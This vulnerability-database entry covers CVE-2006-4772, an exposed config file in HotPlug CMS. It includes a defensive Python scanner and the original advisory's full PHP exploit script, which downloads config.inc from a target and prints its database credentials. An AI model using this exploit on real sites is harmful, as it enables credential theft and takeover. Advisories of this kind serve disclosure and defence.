HotPlug CMS Access Control Vulnerability

Vulnerability ID: 1193516
Vulnerability type: Unknown
Published: 2006-09-13
Updated: 2006-09-13
CVE ID: CVE-2006-4772
CNNVD-ID: CNNVD-200609-224
Platform: N/A
CVSS score: 5.0
|Vulnerability source
https://www.securityfocus.com/bid/84152
https://cxsecurity.com/issue/WLB-2006090100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-224
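|Vulnerability details
HotPlug CMS stores sensitive information under the web root without sufficient access control, which allows remote attackers to read the administrator password and database credentials via a direct request to includes/class/config.inc.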
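
To check an installation for this class of exposure, the following added example (not part of the original advisory or of HotPlug CMS) walks a local web root and reports files that contain PHP source but carry an extension the server would return as plain text. It assumes only .php and .phtml are mapped to the PHP handler and does not evaluate server access rules; the variable names are the ones the advisory's script prints.

```python
import os
import re

# Assumption: only these extensions are mapped to the PHP handler on the audited server.
PHP_HANDLED = {".php", ".phtml"}
# A long or short PHP open tag means the file holds source code ("<?xml" does not match).
PHP_TAG = re.compile(rb"<\?(php|=|\s)", re.I)
# Credential assignments such as $db_password = "..."; names taken from the advisory output.
SECRET_VAR = re.compile(rb"\$(db_(?:name|user|host|password))\s*=", re.I)


def find_exposed_sources(webroot):
    """Return [(relative_path, [secret variable names])] for files under
    webroot that contain PHP code but would be served as plain text."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in sorted(files):
            ext = os.path.splitext(name)[1].lower()
            if ext in PHP_HANDLED:
                continue  # executed by the interpreter, source is not returned
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(256 * 1024)  # the first 256 KiB is enough for a config file
            except OSError:
                continue  # unreadable file: nothing to report
            if not PHP_TAG.search(data):
                continue
            secrets = sorted({m.decode().lower() for m in SECRET_VAR.findall(data)})
            rel = os.path.relpath(path, webroot).replace(os.sep, "/")
            findings.append((rel, secrets))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, secrets in find_exposed_sources(root):
        print(f"{rel}: PHP source served as text; secrets: {', '.join(secrets) or 'none found'}")
```

Any file it reports should be moved outside the web root, or the server should be configured to deny requests for that extension.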
|Exploit
Hello

HotPlug CMS Config File Include Vulnerability

Discovered by : HACKERS PAL

Copyrights : HACKERS PAL

Website : WwW.SoQoR.NeT

Email : security (at) soqor (dot) net

After Script Url Add

includes/class/config.inc

And you will download the config file, so that you will be able to connect with a remote connection program to the MySQL server, change the admin password and control the website.

And This is the exploit if you want :-

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* HotPlug CMS Config File Include Vulnerability exploit
/*                 By : HACKERS PAL
/*                   WwW.SoQoR.NeT
*/
print_r('
/**********************************************/
/*   HotPlug CMS Config File Include Vul      */
/*   by HACKERS PAL <security (at) soqor (dot) net>      */
/*       site: http://www.soqor.net           */');
if ($argc<2) {
print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host             */
/* Example:                                   */
/* php '.$argv[0].' http://localhost/hot    */
/**********************************************/
');
    die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$url=$argv[1];
$exploit="/includes/class/config.inc";
$page=$url.$exploit;
Function get_page($url)
{
    if(function_exists("file_get_contents"))
    {
        $contents = file_get_contents($url);
    }
    else
    {
        $fp=fopen("$url","r");
        while($line=fread($fp,1024))
        {
            $contents=$contents.$line;
        }
    }
    return $contents;
}
$page = get_page($page);
if(eregi("<?php",$page))
{
    $lines = explode("\n",$page);
    $evaled = $lines[50].$lines[51].$lines[52].$lines[53].$lines[54].$lines[55].$lines[56].$lines[58].$lines[58].$lines[59];
    $evaled=str_replace("include","#include",$evaled);
    eval($evaled);
    Echo "\n[+] Database Name : $db_name";
    Echo "\n[+] Database User : $db_user";
    Echo "\n[+] Database Host : $db_host";
    Echo "\n[+] Database Pass : $db_password";
    Die("\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/");
}
else
{
    Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/");
}
?>

WwW.SoQoR.NeT
|Affected products
Hotplug Cms Hotplug Cms 0
|References

Source: BUGTRAQ
Name: 20060911 HotPlug CMS Config File Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/445761/100/0/threaded
Source: SREASON
Name: 1572
Link: http://securityreason.com/securityalert/1572